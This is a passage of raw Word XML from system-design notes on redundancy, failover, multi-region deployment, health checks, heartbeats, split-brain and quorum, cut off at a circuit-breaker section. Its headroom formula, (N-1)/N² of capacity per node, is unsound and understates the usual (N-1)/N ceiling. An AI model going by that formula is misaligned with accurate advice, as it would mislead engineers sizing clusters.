        <w:t> to absorb the failed instance's load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7D5E8D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Headroom is critical:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> In an active-active cluster of N nodes, each node should normally run at </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1/N × (N-1)/N = (N-1)/N²</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> of its maximum capacity. For 3 nodes: each runs at ~22% of max, so when one fails, the other two absorb its load and run at ~33% each — still well under capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A12C88" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>In practice, many teams run at 70–80% normal load with 3 nodes — one node failure means the remaining two go to 105–120% capacity. They </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fail under failure conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — a common misconfiguration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423600B3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N+1 redundancy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Have N instances needed for full capacity, plus 1 spare. Under normal operation, the spare is idle or handles minimal load. Under failure, the spare is activated. Used for databases, critical infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC59BB6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N+2 redundancy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Two spares. Can survive two simultaneous failures. Required for 5-nine systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F35B67" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Passive Redundancy (Hot Standby)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A06406F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A primary instance handles all traffic. A standby instance runs in parallel, receiving all state updates (replication), but </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>doesn't serve traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>. On primary failure, traffic is switched to the standby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE296C5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Failover time</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> = time to detect failure + time to promote standby + time to redirect traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBF0977" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Typical failover time: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>30 seconds to 5 minutes</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> depending on detection mechanism and automation sophistication. During this window, the system is unavailable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADAE47D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Warm standby:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Standby is running and synchronized but needs a short initialization before serving. Faster than cold standby, less expensive than hot standby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7C431D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cold standby:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Standby is powered off or in a minimal state. Requires significant startup time on failure. Used for disaster recovery scenarios where RPO/RTO requirements are looser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C276FBF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Geographic Redundancy (Multi-Region)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF6E5C6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Single-datacenter redundancy (multiple servers in one DC) protects against </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>server and rack failures</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>. Geographic redundancy protects against </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>datacenter-level failures</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (power loss, natural disasters, network connectivity loss, entire cloud region outages).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD9D2A4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-AZ (Availability Zone):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Deploy across multiple isolated data centers within the same geographic region. AZs have independent power, cooling, and networking but are connected by low-latency (&lt;2ms) private fiber. This is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>minimum viable redundancy</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> for production systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5872C534" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-Region:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Deploy across geographically distant regions (US-East, EU-West, Asia-Pacific). Protects against regional disasters. Adds </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>significant latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> to writes (cross-region replication: 50–200ms). Requires careful consistency model selection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46043DD2" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Active Multi-Region:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> All regions serve traffic simultaneously. Users are routed to nearest region via GeoDNS. Writes are replicated across regions asynchronously. Strong consistency is sacrificed — reads in a region may not reflect writes just committed in another region. Used by global-scale systems (Google, Facebook, Netflix) where geographic proximity to users is critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC48AA4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Passive Multi-Region:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> One region is primary (serves all traffic), other regions are standby. On primary region failure, DNS is updated to point to a standby region. Simpler consistency model (only one region writes), but </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>failover is slow</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (DNS TTL propagation + application warmup: minutes to hours) and the standby region resources are mostly idle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0777E4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="614D3886">
          <v:rect id="_x0000_i2150" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8F3626" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Failure Detection — How Systems Know Something Is Wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641D4537" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>You cannot recover from a failure you don't know about. Failure detection is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>critical path</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> for availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F54118" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Health Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CF280F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shallow health checks (L4):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> TCP connect to the port. If the connection succeeds, the instance is "healthy." Fast and lightweight but misses application-level failures — a process can accept TCP connections while being completely deadlocked internally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E40A855" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deep health checks (L7):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> HTTP GET to /health endpoint. The application actually executes some internal logic — checks database connectivity, checks critical dependencies, checks internal queue depths. Returns detailed status. Slower but far more accurate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21869966" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dependency health checks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> The /health endpoint internally checks all critical dependencies (database, cache, downstream services) and fails if any critical dependency is unhealthy. Danger: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cascading false positives</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>. If the health check depends on a flaky dependency, instances are incorrectly marked unhealthy even though they could serve some requests. Best practice: distinguish between </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>liveness</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (is the process running?) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>readiness</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (is the process ready to serve traffic?).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B7B3B3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Liveness vs Readiness (Kubernetes model):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7975A51A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Liveness probe:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Is the container alive? Failure → restart the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314BD6CC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Readiness probe:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Is the container ready to serve traffic? Failure → remove from load balancer pool (but don't restart).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457C2FCB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Startup probe:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Has the container finished initializing? Prevents premature liveness checks from killing slow-starting containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484256DD" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>This separation is crucial — a container that's alive but not ready (e.g., still loading a large model into memory) should be kept running but not receive traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340B2724" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Heartbeats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE9552A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>For distributed systems (clusters, consensus groups), nodes send </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>periodic heartbeat messages</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> to each other. Missing heartbeats for more than a threshold period (usually 3× the heartbeat interval) indicates the node may be down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5474F1DE" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Heartbeat timeout tuning is critical:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256FA1AC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Too short:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> False positives — network jitter causes missed heartbeats, triggering unnecessary failovers (which are themselves disruptive).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469A1D06" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Too long:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Slow failure detection — the system is down for N seconds before recovery begins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21584B58" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Phi Accrual Failure Detector (used by Cassandra, Akka):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Instead of a binary up/down judgment from fixed timeouts, it outputs a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>suspicion level φ</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — a continuous value representing the probability that a node is down, computed from the statistical distribution of heartbeat intervals. As missed heartbeat intervals grow, φ increases. The caller decides the φ threshold at which to act. This adapts automatically to network conditions — on a slow network with high jitter, the threshold effectively auto-adjusts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534F327A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Split-Brain Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2050656A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>When a network partition occurs, nodes on each side of the partition can't reach nodes on the other side. Both sides may </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>believe the other side is down</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> and try to promote themselves to leader — resulting in two primaries, both accepting writes, diverging state. This is split-brain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474F46FC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Split-brain is one of the most dangerous failure modes</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47630338" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Both halves continue functioning (no outage from either half's perspective).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7F54BC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Both halves accept conflicting writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE27E85" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>When the partition heals, you have conflicting state that must be reconciled — which may be impossible without manual intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1CA66F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Data loss or corruption is common.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5529BC60" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prevention — Quorum:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> A node can only become leader if it has confirmation from a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>majority (quorum)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> of nodes. With 3 nodes, quorum is 2. If a network partition splits 3 nodes into [1] and [2], the [2] partition has quorum and can elect a leader. The [1] partition cannot form quorum and </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stops accepting writes</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>. Only one partition can have quorum at a time — split-brain is impossible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2C96BA" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>This is why distributed systems use </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>odd numbers of nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (3, 5, 7) — even numbers can split evenly (2+2), with neither side having a strict majority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729F2DF7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="6A7E4744">
          <v:rect id="_x0000_i2151" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB3591C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Fault Tolerance Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6E7517" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit Breaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8EDF1A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Already mentioned in scalability but let's go deep on internal mechanics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A11CA13" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A circuit breaker wraps calls to downstream services and tracks their outcomes. It has </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>three states</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> with precise transition rules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17822ED2" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
